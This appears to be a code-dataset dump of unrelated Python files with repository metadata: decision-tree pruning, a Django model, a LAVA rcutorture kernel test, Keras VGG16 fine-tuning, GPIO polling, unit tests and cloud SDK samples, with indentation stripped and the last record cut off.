def entropy_summand(node, p):
if p == 0:
return 0
else:
return float(len(node.local_data)) * p * log(p) # equivalent to n_k * log(p)
return -sum(entropy_summand(node, p) for p in node.prob_vec)
# compute the sum-of-squared error for the current node (for regression trees)
def get_node_sse(self, node, ref):
if not ref:
return sum((y - node.mu) ** 2 for y in node.local_data[self.response])
else:
return sum(sample['predictive_var'] + (sample[self.response] - node.mu) ** 2 for
key, sample in node.local_data.iterrows())
# compute maximum likelihood estimate of the mean parameter of the current node (for regression trees)
def set_node_mu_ml(self, node, ref):
if ref:
node.mu = sum(sample[self.response] for key, sample in node.local_data.iterrows()) / node.size
else:
node.mu = node.local_data[self.response].mean()
# compute the maximum likelihood estimate of the probability vector of the current node (for classification trees)
def set_node_prob_vec(self, node):
size = float(len(node.local_data))
value_count = node.local_data[self.response].value_counts()
node.prob_vec = [value_count[key] / size for key in value_count.keys()]
# returns the best internal node to be prunned with the pruning cost
def get_best_prune(self, ref, alpha=None):
best_cut_cost, best_node = min(self.iter_prune_cost(ref, alpha),
key=lambda x: x[0])
return [best_cut_cost, best_node]
# computes the pruning costs of each internal node
def iter_prune_cost(self, ref, alpha):
for node in self.vertices:
if node not in self.leaves and node is not self.get_root():
yield [self.prune_cost(node, ref, alpha), node]
def prune_cost(self, node, ref, alpha):
if self.tree_kind is 'regression':
node_cost = 0
for leaf in self.leaves:
if leaf not in self.get_node_leaves(node):
node_cost += self.get_node_sse(leaf, ref)
node_cost += self.get_node_sse(node, ref)
if alpha is None:
node_cost = log(node_cost)
subtree_cost = log(sum(self.get_node_sse(leaf, ref) for leaf in self.leaves))
return (node_cost - subtree_cost) / (len(self.get_node_leaves(node))-1)
elif alpha == 0:
# The goal is to minimize log(\sigma^2) with \sigma^2 = \sum_{i=1^b}\sum(j=1^n_i) SSE_i. This is done by
# selecting a node to be prunned which minimizes C(T_t) where T_t is a subtree generated by prunning the
# internal node t from the tree T.
return log(node_cost)
else:
node_cost = 0
for leaf in self.leaves:
if leaf not in self.get_node_leaves(node):
node_cost += self.get_node_entropy(leaf)
node_cost += self.get_node_entropy(node)
if alpha is None:
subtree_cost = sum(self.get_node_entropy(leaf) for leaf in self.leaves)
return (node_cost - subtree_cost) / (len(self.get_node_leaves(node))-1)
elif alpha == 0:
return node_cost
else:
return node_cost + alpha * (len(self.leaves) - len(self.get_node_leaves(node)) + 1)
# assign the new data to the leaves
def load_new_data(self, data):
self.data = data
self.data_size = len(data)
for node in self.node_iter_down(self.get_root()):
if node.parent == None:
node.local_data = node.local_filter(data)
else:
node.local_data = node.local_filter(node.parent.local_data)
# fetching the leaves of a subtree rooted at node
def get_node_leaves(self, node):
leaves = set([])
for descendant in self.node_iter_down(node):
if descendant in self.leaves:
leaves.add(descendant)
return leaves
# traversing a subtree rooted at base to its leaves
def node_iter_down(self, base, first=True):
if first:
yield base
if base.children == None:
return
if base.children == None:
yield base
else:
for child in base.children:
yield child
for node in self.node_iter_down(child, first=False):
yield node
def train(self, tr_data, data_type_dict, parameters, output_path=None, tst_data=None, run=None, m_ind=None):
''' parameters:
run: index of each run in [1,50],
m_ind: method index: 0 refers to the interpretability prior approach (when fitting proxy model to the original
training data; 1-3 refers to the proxy model fitted to the reference model where:
1: BART with ntree obtained using CV
2: BART with ntree = 3, and
3: GP.'''
self.vertices = []
self.edges = set([])
self.leaves = set([])
self.data_type_dict = data_type_dict
self.tree_kind = parameters['tree_kind']
self.response = parameters['response']
self.min_node_size = parameters['min_node_size']
self.max_node_depth = parameters['max_node_depth']
alpha = parameters['alpha']
prune = parameters['prune']
ref = parameters['ref']
self.data = tr_data
self.grow_tree(ref)
if prune:
if alpha is None:
return self.prune_tree(alpha, tst_data, ref, run, m_ind, output_path)
else:
self.prune_tree(alpha, tst_data, ref, run, m_ind, output_path)
# fetching all the data of a leaf node
def get_data_leaf(self, datapoint):
if self.children is None:
return self
else:
if type(self.pivot) == set:
if datapoint[self.split_attribute] in self.pivot:
return self.left.get_data_leaf(datapoint)
else:
return self.right.get_data_leaf(datapoint)
else:
if datapoint[self.split_attribute] <= self.pivot:
return self.left.get_data_leaf(datapoint)
else:
return self.right.get_data_leaf(datapoint)
# find the leaf node to which newdata belongs and send back the mean parameter of the leaf
def predict(self, newdata):
predictions = np.zeros(newdata.shape[0])
for i, (index, datapoint) in enumerate(newdata.iterrows()):
if self.tree_kind is 'regression':
predictions[i] = self.vertices[0].get_data_leaf(datapoint).mu
else:
probs = self.vertices[0].get_data_leaf(datapoint).prob_vec
predictions[i] = probs.index(max(probs))
return predictions
# compute the RMSE of the test data
def test(self, data):
if self.tree_kind is 'regression':
pred = self.predict(data)
return sqrt(sum((data[self.response] - pred) ** 2)/len(data))
else:
miss_classification_rate = 0
for leaf in self.leaves:
leaf.predicted_class = leaf.prob_vec.index(max(leaf.prob_vec))
leaf_error = leaf.local_data[self.response].value_counts()
if leaf.predicted_class in leaf_error.keys():
leaf_error = 1 - leaf_error[leaf.predicted_class]/float(len(leaf.local_data))
else:
leaf_error = 1
miss_classification_rate += leaf_error
return miss_classification_rate
class RegressionTree(DecisionTree, object):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def plot(self, s = 0, margin = 35):
A = self.get_adjacency_matrix_as_list()
convert_to_igraph = ig.Graph.Adjacency(A)
g = convert_to_igraph
for vertex in self.vertices:
index = self.vertices.index(vertex)
if vertex.pivot != None:
if type(vertex.pivot) == set:
label_pivot = ' in ' + str(list(vertex.pivot))
else:
label_pivot = ' less than ' + str(round(vertex.pivot, 2))
g.vs[index]['label'] = str(vertex.split_attribute) + label_pivot
g.vs[index]['label_dist'] = 3
g.vs[index]['label_color'] = 'red'
g.vs[index]['color'] = 'red'
g.vs[index]['size'] = 40
else:
label = round(vertex.mu, 2)
g.vs[index]['color'] = 'blue'
g.vs[index]['label'] = str(label)
g.vs[index]['label_dist'] = 1
g.vs[index]['label_color'] = 'blue'
g.vs[index]['size'] = 40
root_index = self.vertices.index(self.get_root())
layout = g.layout_reingold_tilford(root=[root_index])
ig.plot(g, layout=layout, margin=margin)
class ClassificationTree(DecisionTree, object):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def plot(self, s=0, margin=35):
A = self.get_adjacency_matrix_as_list()
convert_to_igraph = ig.Graph.Adjacency(A)
g = convert_to_igraph
for vertex in self.vertices:
index = self.vertices.index(vertex)
if vertex.pivot != None:
if type(vertex.pivot) == set:
label_pivot = ' in ' + str(list(vertex.pivot))
else:
label_pivot = ' less than ' + str(vertex.pivot)
g.vs[index]['label'] = str(vertex.split_attribute) + label_pivot
g.vs[index]['label_dist'] = 3
g.vs[index]['label_color'] = 'red'
g.vs[index]['color'] = 'red'
g.vs[index]['size'] = 40
else:
label = str(vertex.predicted_class)
g.vs[index]['color'] = 'blue'
g.vs[index]['label'] = label
g.vs[index]['label_dist'] = 1
g.vs[index]['label_color'] = 'blue'
g.vs[index]['size'] = 40
root_index = self.vertices.index(self.get_root())
layout = g.layout_reingold_tilford(root=root_index)
ig.plot(g, "example_tree_" + str(s) + ".pdf", layout=layout, bbox=(650, 650), margin=margin)
|
[
"[email protected]"
] | |
afcb824861fbac4be730a519487cc5aca554d744
|
2836d0c8648a02f326bac0f5748a57ff1bcf0169
|
/issue/models.py
|
73961f57dcf9cddc29ff756dd29acb582d9e36ff
|
[] |
no_license
|
blockbyte-sbhack19/web
|
dce37bf81a2a801bed892f7a061d58f42864d1f2
|
543db71b7616e4c1fd2bdba333ec3a9efa45a40a
|
refs/heads/master
| 2020-06-08T08:40:16.501744 | 2019-06-22T20:26:20 | 2019-06-22T20:26:20 | 193,198,744 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 298 |
py
|
from django.db import models
class Soil(models.Model):
location = models.CharField(max_length=200)
size = models.CharField(max_length=200)
price = models.CharField(max_length=200)
beforeDate = models.DateTimeField('beforeDate')
afterDate = models.DateTimeField('afterDate')
|
[
"[email protected]"
] | |
1ba4b6a2f09c11c36c36f246039c90cfc4286031
|
7f402e7bf0f56f3f5d4251e8e39352855816156c
|
/ubuntu/scripts/rcutorture.py
|
6b7d6ac997dce39a667ff64fc15abb768ed63239
|
[] |
no_license
|
wuyuer/lava-test-cases
|
3aab1b92e610351102f857183a0361e0a524af8c
|
4e2c280a8ef53e082336290d37500520f18430b9
|
refs/heads/master
| 2021-01-10T02:22:29.748180 | 2016-01-13T11:58:39 | 2016-01-13T11:58:39 | 49,557,984 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,548 |
py
|
#!/usr/bin/env python
#
# RCU Torture test for Linux Kernel.
#
# Copyright (C) 2010 - 2014, Linaro Limited.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# Author: Botao Sun <[email protected]>
import os
import sys
import time
import shlex
import subprocess
# Result collection for LAVA
debug_switcher = False
def collect_result(testcase, result):
if debug_switcher is False:
subprocess.call(['lava-test-case', testcase, '--result', result])
else:
print ['lava-test-case', testcase, '--result', result]
# Switch to home path of current user
home_path = os.path.expanduser("~")
os.chdir(home_path)
print os.getcwd()
# RCU Torture start check
rcutorture_start = 'modprobe rcutorture'
rcutorture_time = sys.argv[1]
start_return = subprocess.call(shlex.split(rcutorture_start))
if start_return != 0:
collect_result('rcutorture-start', 'fail')
collect_result('rcutorture-module-check', 'skip')
collect_result('rcutorture-end', 'skip')
sys.exit(1)
else:
print 'RCU Torture test started. Test time is ' + str(rcutorture_time) + ' Seconds.'
collect_result('rcutorture-start', 'pass')
time.sleep(int(rcutorture_time))
# RCU Torture module check
lsmod_output = subprocess.check_output(['lsmod'])
print lsmod_output
lsmod_list = lsmod_output.split()
torture_list = filter(lambda x: x.find('torture') != -1, lsmod_list)
if torture_list == []:
print 'Cannot find rcutorture module in lsmod, abort!'
collect_result('rcutorture-module-check', 'fail')
collect_result('rcutorture-end', 'skip')
sys.exit(1)
elif len(torture_list) == 1:
rcutorture_end = 'rmmod ' + torture_list[0]
collect_result('rcutorture-module-check', 'pass')
elif len(torture_list) > 1:
print 'More than one item with torture in name, please check it manually.'
collect_result('rcutorture-module-check', 'fail')
collect_result('rcutorture-end', 'skip')
sys.exit(1)
# RCU Torture result check
end_keyword = 'rcu-torture:--- End of test'
end_return = subprocess.call(shlex.split(rcutorture_end))
if end_return != 0:
print 'RCU Torture terminate command ran failed.'
collect_result('rcutorture-end', 'fail')
sys.exit(1)
else:
keyword_counter = 0
output = subprocess.check_output(['dmesg'])
output_list = output.split('\n')
for item in output_list:
if end_keyword in item:
keyword_counter = keyword_counter + 1
print 'RCU Torture test has finished.'
if 'SUCCESS' in item:
collect_result('rcutorture-end', 'pass')
sys.exit(0)
else:
print 'RCU Torture finished with issues.'
collect_result('rcutorture-end', 'fail')
sys.exit(1)
if keyword_counter == 0:
print 'Cannot find the ending of this RCU Torture test.'
collect_result('rcutorture-end', 'fail')
|
[
"[email protected]"
] | |
4b7a7e5245954567017ea30f2e6e5b2a68d61c27
|
38c35956be6343855914b1c58b8fbd2e40c6e615
|
/AdHoc/1030.py
|
6cab25d7e55eca194d128a95ba59b1e53ae65c24
|
[] |
no_license
|
LucasBarbosaRocha/URI
|
b43e4f4a6b3beed935f24839001bea354411c4bd
|
2c9bcc13300a9f6243242e483c8f9ec3296a88ad
|
refs/heads/master
| 2020-06-25T05:06:51.297824 | 2019-08-22T04:50:11 | 2019-08-22T04:50:11 | 199,210,037 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 450 |
py
|
nc = int(input())
for i in range(nc):
entrada = input().split(" ")
n = int(entrada[0])
k = int(entrada[1])
lista = [1]*n
vivos = n
pos = 0
while vivos > 1:
j = 0
while j < k:
while (lista[pos] == -1):
pos = pos + 1
if (pos == n):
pos = 0
pos = pos + 1
if (pos == n):
pos = 0
j = j + 1
lista[pos - 1] = -1
vivos = vivos - 1
#print (lista)
print ("Case %d: %d" %((i+1), lista.index(max(lista)) + 1))
|
[
"[email protected]"
] | |
3179f9de593ae3fcecf09342a4adc0d941e09c45
|
586ee79d0963d6183cf45656c2b0b9dd115226ce
|
/python_basic/textFile/textPross.py
|
2723559965dc1d5952ece9bc84a0ad1e501c5d31
|
[] |
no_license
|
nie-xin/GeometryAlgorithms
|
afd62e3c5e45c1ddeb0c0fa768accc0b2d5ea176
|
392fde108b24a7c23c4e61c211cfe3d8e7901338
|
refs/heads/master
| 2021-01-18T13:54:39.332207 | 2013-12-10T12:39:16 | 2013-12-10T12:39:16 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 316 |
py
|
import os
if os.path.exists('sketch.txt'):
data = open('sketch.txt')
for each_line in data:
if not each_line.find(':') == -1:
(role, line_spoken) = each_line.split(':', 1)
print(role, end='')
print(' said: ', end='')
print(line_spoken, end='')
data.close()
else:
print('The data file is missing')
|
[
"[email protected]"
] | |
31fd854d20dd39dbe8cb2df8574a881bb9c4c0bc
|
49c626418cf64cf0bae7bc5a9a481359692e0a19
|
/5-21.py
|
de8ca4dfa3cf3c9cf67ad74b6214d81dd4b16c67
|
[] |
no_license
|
WebGLer/on-my-window
|
086c53090ff3bdcc5f139bb1fd0ab3f55c3bb68c
|
a625687c0493746dcc3d098950eb0c582f29e911
|
refs/heads/master
| 2020-07-22T12:19:54.161777 | 2019-11-26T09:19:08 | 2019-11-26T09:19:08 | 207,200,697 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,001 |
py
|
#给出文件夹路径
import os
base_dir = "D:\\参赛文件\\cats_and_dogs_small"
train_dir = os.path.join(base_dir,'train')
validation_dir = os.path.join(base_dir,'validation')
test_dir = os.path.join(base_dir,'test')
#使用数据增强的特征提取
from tensorflow.python.keras.applications import VGG16
data_path = "F:\\5-model data\\vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5"
conv_base = VGG16(
weights = data_path,
include_top =False,
input_shape = (150,150,3)
)
from tensorflow.python.keras import layers,models
model = models.Sequential()
model.add(conv_base)
model.add(layers.Flatten())
model.add(layers.Dense(256,activation='relu'))
model.add(layers.Dense(1,activation='sigmoid'))
print("model.trainable_weights=",len(model.trainable_weights))
# conv_base.trainable = False
#冻结conv_base层网络并将最后一个卷积层解冻
set_trainable = False
for layer in conv_base.layers:
if layer.name =='block5_conv1':
set_trainable = True
if set_trainable:
layer.trainable = True
else:
layer.trainable = False
print("After freeaed model.trainable_weights=",len(model.trainable_weights))
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from tensorflow.python.keras import optimizers
train_datagen = ImageDataGenerator(
rescale=1./255,
rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode='nearest'
)
validation_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
train_dir,
target_size=(150,150),
batch_size=20,
class_mode='binary'
)
validation_generator = validation_datagen.flow_from_directory(
validation_dir,
target_size=(150,150),
batch_size=20,
class_mode='binary'
)
model.compile(
loss='binary_crossentropy',
optimizer=optimizers.RMSprop(lr=1e-5),
metrics=['acc']
)
history = model.fit_generator(
train_generator,
steps_per_epoch=100,
epochs=100,
validation_data=validation_generator,
validation_steps=50
)
#保存模型
import time
now = time.strftime('%Y-%m-%d %H-%M-%S')
file_path = "E:\\1- data\\models\\"+now+" cats_and_dogs VGG16-数据增强-模型最后卷积层网络微调.h5"
model.save(file_path)
#下面是绘制图像
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1,len(acc)+1)
plt.plot(epochs,acc,'bo',label = 'Training acc')
plt.plot(epochs,val_acc,'b',label ='Validation acc' )
plt.title('Training and Validation accuracy')
plt.legend()
plt.figure()
plt.plot(epochs,loss,'bo',label = 'Training loss')
plt.plot(epochs,val_loss,'b',label ='Validation loss' )
plt.title('Training and Validation Loss')
plt.legend()
plt.show()
|
[
"[email protected]"
] | |
d48a095767b13aa2d16d266ded3f78a690976077
|
26d04fb000bdd882120109c5aec82c26fb1d9cdb
|
/interface/truck/__init__.py
|
e810248328b99d73020b3228397809e9354e9401
|
[] |
no_license
|
blomqvist/thesis
|
445ae2dafebd2c2361ec28f9a9c1e55b1f20a4d7
|
532d0e47a18c05cf643a5898c6f92020d2f7e6d0
|
refs/heads/master
| 2020-05-17T04:22:37.097397 | 2016-01-28T18:21:40 | 2016-01-28T18:21:40 | 30,926,038 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 19 |
py
|
__all__ = ["Truck"]
|
[
"[email protected]"
] | |
177debec7b606199f56acb03e4ef5f5046d2badc
|
895d67c065919ac132f9ef9ddeb667d8d4aca4cc
|
/pratice_wework_delete_contactor_po_appium/page/info.py
|
338a28dccc28f71ab88dc664da45f652b66bd35c
|
[] |
no_license
|
testdemo11/Hogwart_pratice
|
57df9afb1038b77bfccefe3f6cdffaf2cce41175
|
ebc025a2272beb5f0d25fd16ea7d06ffe460ed23
|
refs/heads/main
| 2023-03-28T08:04:01.716982 | 2021-03-30T03:50:23 | 2021-03-30T03:50:23 | 350,715,597 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 417 |
py
|
# -*- coding:utf-8 -*-
__author__ = 'Tnew'
from pratice_demo.pratice_wework_delete_contactor_po_appium.basepage import BasePage
from pratice_demo.pratice_wework_delete_contactor_po_appium.page.edit import Edit
class Info(BasePage):
def goto_edit_contactor(self):
# 点击更多,进入编辑用户信息界面
self.step('../data/info.yaml',"goto_edit_contactor")
return Edit(self.driver)
|
[
"[email protected]"
] | |
bd3dba7cedd5c61ce2c28d80320106ebde0e7bd2
|
ec8d7c3176187359c7618bd591724ea93a9b0772
|
/python/testing/cookbook/01-unit/recipe5.py
|
e519029af5beb796eb5f3a107a9494b28b0e38ed
|
[] |
no_license
|
almacro/snippets
|
7000faf593ab97a0890ea56d944ceef4ef23643a
|
e247c5bc26f336add1c7be8636775f841a65615d
|
refs/heads/master
| 2023-08-05T11:00:13.161159 | 2023-07-23T15:31:42 | 2023-07-23T15:31:42 | 65,136,325 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 974 |
py
|
class RomanNumeralConverter(object):
def __init__ (self):
self.digit_map = {"M":1000, "D":500, "C":100, "L":50, "X":10, "V":5, "I":1}
def convert_to_decimal(self, roman_numeral=""):
val = 0
for char in roman_numeral:
val += self.digit_map[char]
return val
import unittest
class RomanNumeralConverterTest(unittest.TestCase):
def setUp(self):
self.cvt = RomanNumeralConverter()
def test_parsing_millenia(self):
self.assertEqual(1000, self.cvt.convert_to_decimal("M"))
def test_parsing_century(self):
self.assertEqual(100, self.cvt.convert_to_decimal("C"))
class RomanNumeralComboTest(unittest.TestCase):
def setUp(self):
self.cvt = RomanNumeralConverter()
def test_multi_millenia(self):
self.assertEqual(4000, self.cvt.convert_to_decimal("MMMM"))
def test_multi_add_up(self):
self.assertEqual(2010, self.cvt.convert_to_decimal("MMX"))
|
[
"[email protected]"
] | |
548ae2da86ee3cad8a9df7b3561adf9b60b9ef4c
|
2aafa49c445580d39d647b753081a9a4a38614cf
|
/src/Guidance_system/guidance_sys/GPIO.py
|
ed85194103ada3ea6f56d75a5d29ec9d0a03988e
|
[
"MIT"
] |
permissive
|
Joseph-tsai415/Msc-All-Terrain-Robot
|
e623dc3438764877545ec2229f84e4a0c22953fb
|
40973b8d1b088d37efc372f6313ee58d18792c02
|
refs/heads/master
| 2023-01-16T00:39:11.932757 | 2020-11-30T10:51:38 | 2020-11-30T10:51:38 | 297,651,543 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 695 |
py
|
import RPi.GPIO as GPIO
from time import sleep # this lets us have a time delay (see line 12)
# for GPIO numbering, choose BCM
GPIO.setmode(GPIO.BCM)
# or, for pin numbering, choose BOARD
#GPIO.setmode(GPIO.BOARD)
GPIO.setup(25, GPIO.IN,pull_up_down=GPIO.PUD_DOWN) # set GPIO 25 as input
GPIO.setup(18, GPIO.OUT)
GPIO.output(18, GPIO.HIGH)
try:
while True: # this will carry on until you hit CTRL+C
#if GPIO.input(25): # if port 25 == 1
print(GPIO.input(25))
sleep(0.1) # wait 0.1 seconds
except KeyboardInterrupt:
GPIO.cleanup() # clean up after yourself
#https://learn.sparkfun.com/tutorials/raspberry-gpio/python-rpigpio-api
|
[
"[email protected]"
] | |
546e354836cc463b0eb0ee84e5a037c8c4895543
|
dcb0bb373ff999dc784e68f2d05cccd26548da67
|
/manage.py
|
1a34b77f248a40122a51aadead42a3d014da3476
|
[] |
no_license
|
JulioLopez2/DjangoTut
|
cc1c09975cdb6523f0ad787a6479940c45782860
|
00ec21e39ff409b240556c63b49a4c32098431d3
|
refs/heads/main
| 2023-04-17T22:54:20.707978 | 2021-04-30T22:53:03 | 2021-04-30T22:53:03 | 361,031,405 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 563 |
py
|
#!/usr/bin/env python
import os
import sys
print("Hello world")
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "trydjango.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
|
[
"[email protected]"
] | |
5be296e2bc7bd3fdd5941a9aa4e3e8e66ecaa693
|
a2d36e471988e0fae32e9a9d559204ebb065ab7f
|
/huaweicloud-sdk-meeting/huaweicloudsdkmeeting/v1/model/search_his_meetings_response.py
|
9079e05888af9d2c2ce545a7033572d3306fef6e
|
[
"Apache-2.0"
] |
permissive
|
zhouxy666/huaweicloud-sdk-python-v3
|
4d878a90b8e003875fc803a61414788e5e4c2c34
|
cc6f10a53205be4cb111d3ecfef8135ea804fa15
|
refs/heads/master
| 2023-09-02T07:41:12.605394 | 2021-11-12T03:20:11 | 2021-11-12T03:20:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,130 |
py
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class SearchHisMeetingsResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'offset': 'int',
'limit': 'int',
'count': 'int',
'data': 'list[ConferenceInfo]'
}
attribute_map = {
'offset': 'offset',
'limit': 'limit',
'count': 'count',
'data': 'data'
}
def __init__(self, offset=None, limit=None, count=None, data=None):
"""SearchHisMeetingsResponse - a model defined in huaweicloud sdk"""
super(SearchHisMeetingsResponse, self).__init__()
self._offset = None
self._limit = None
self._count = None
self._data = None
self.discriminator = None
if offset is not None:
self.offset = offset
if limit is not None:
self.limit = limit
if count is not None:
self.count = count
if data is not None:
self.data = data
@property
def offset(self):
"""Gets the offset of this SearchHisMeetingsResponse.
第几条。
:return: The offset of this SearchHisMeetingsResponse.
:rtype: int
"""
return self._offset
@offset.setter
def offset(self, offset):
"""Sets the offset of this SearchHisMeetingsResponse.
第几条。
:param offset: The offset of this SearchHisMeetingsResponse.
:type: int
"""
self._offset = offset
@property
def limit(self):
"""Gets the limit of this SearchHisMeetingsResponse.
每页的记录数。
:return: The limit of this SearchHisMeetingsResponse.
:rtype: int
"""
return self._limit
@limit.setter
def limit(self, limit):
"""Sets the limit of this SearchHisMeetingsResponse.
每页的记录数。
:param limit: The limit of this SearchHisMeetingsResponse.
:type: int
"""
self._limit = limit
@property
def count(self):
"""Gets the count of this SearchHisMeetingsResponse.
总记录数。
:return: The count of this SearchHisMeetingsResponse.
:rtype: int
"""
return self._count
@count.setter
def count(self, count):
"""Sets the count of this SearchHisMeetingsResponse.
总记录数。
:param count: The count of this SearchHisMeetingsResponse.
:type: int
"""
self._count = count
@property
def data(self):
"""Gets the data of this SearchHisMeetingsResponse.
会议信息列表。
:return: The data of this SearchHisMeetingsResponse.
:rtype: list[ConferenceInfo]
"""
return self._data
@data.setter
def data(self, data):
"""Sets the data of this SearchHisMeetingsResponse.
会议信息列表。
:param data: The data of this SearchHisMeetingsResponse.
:type: list[ConferenceInfo]
"""
self._data = data
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SearchHisMeetingsResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"[email protected]"
] | |
d94e881b7392a797a21413588260985a5b523625
|
f576f0ea3725d54bd2551883901b25b863fe6688
|
/sdk/digitaltwins/azure-mgmt-digitaltwins/generated_samples/digital_twins_put_with_public_network_access.py
|
f83ed93ccc50f1aa7c7d34e29e6c867c534c64f5
|
[
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] |
permissive
|
Azure/azure-sdk-for-python
|
02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
|
c2ca191e736bb06bfbbbc9493e8325763ba990bb
|
refs/heads/main
| 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 |
MIT
| 2023-09-14T21:48:49 | 2012-04-24T16:46:12 |
Python
|
UTF-8
|
Python
| false | false | 1,775 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.digitaltwins import AzureDigitalTwinsManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-digitaltwins
# USAGE
python digital_twins_put_with_public_network_access.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = AzureDigitalTwinsManagementClient(
credential=DefaultAzureCredential(),
subscription_id="50016170-c839-41ba-a724-51e9df440b9e",
)
response = client.digital_twins.begin_create_or_update(
resource_group_name="resRg",
resource_name="myDigitalTwinsService",
digital_twins_create={"location": "WestUS2", "properties": {"publicNetworkAccess": "Enabled"}},
).result()
print(response)
# x-ms-original-file: specification/digitaltwins/resource-manager/Microsoft.DigitalTwins/stable/2023-01-31/examples/DigitalTwinsPut_WithPublicNetworkAccess.json
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
6e6adb4ac5f39c2697616a67a264d17e179d9eef
|
e112fb4549c00a77530b32c67c748d66c19a4f87
|
/ex14.py
|
4d0c00f540374edd2b21c714349eb91b5b84b049
|
[] |
no_license
|
XinCui2018/Python-Hard-Way
|
1abff62cc7a7027affb6bcdb467fc0cb7fba127a
|
05f338a16aec58485c643d3156768aa87bb414ec
|
refs/heads/master
| 2022-10-11T13:34:11.972437 | 2020-06-08T13:05:13 | 2020-06-08T13:05:13 | 270,669,812 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,135 |
py
|
# from sys import argv
# script, user_name = argv
# prompt = '> '
# print ("Hi %s, I'm the %s script." % (user_name, script))
# print ("I'd like to ask you a few questions.")
# print ("Do you like me %s?" % user_name)
# likes = input(prompt)
# print ("Where do you live %s?" % user_name)
# lives = input(prompt)
# print ("What kind of computer do you have?")
# computer = input(prompt)
# print ("""
# Alright, so you said %r about liking me.
# You live in %r. Not sure where that is.
# And you have a %r computer. Nice.
# """ % (likes, lives, computer))
from sys import argv
script, user_name = argv
prompt = '> '
print ("Hi %s, this is the %s script." %(user_name, script))
print ("Can I ask you some questions?")
print ("Do you like me, %s?" % user_name)
likes = input(prompt)
print ("Where do you live, %s?" % user_name)
lives = input(prompt)
print ("What kind of computer do you use?")
computer = input(prompt)
print ("""
Alright, you said %r about liking me.
You live in %r, do not know where that is.
You have a %r computer. It is awesome.
""" % (likes, lives, computer))
|
[
"[email protected]"
] | |
3d64a5bfed4cc338ce7b38db5ada112fe517c445
|
dfd51748ba20c9af87925f30db1cd283fb5554f6
|
/invenio_rdm_records/services/components/relations.py
|
0b83ec0fe8c3975b0baf477b1c3e2ba6486a11da
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
ppanero/invenio-rdm-records
|
6daf38464755b04d33fd706148b7001a3c2500a9
|
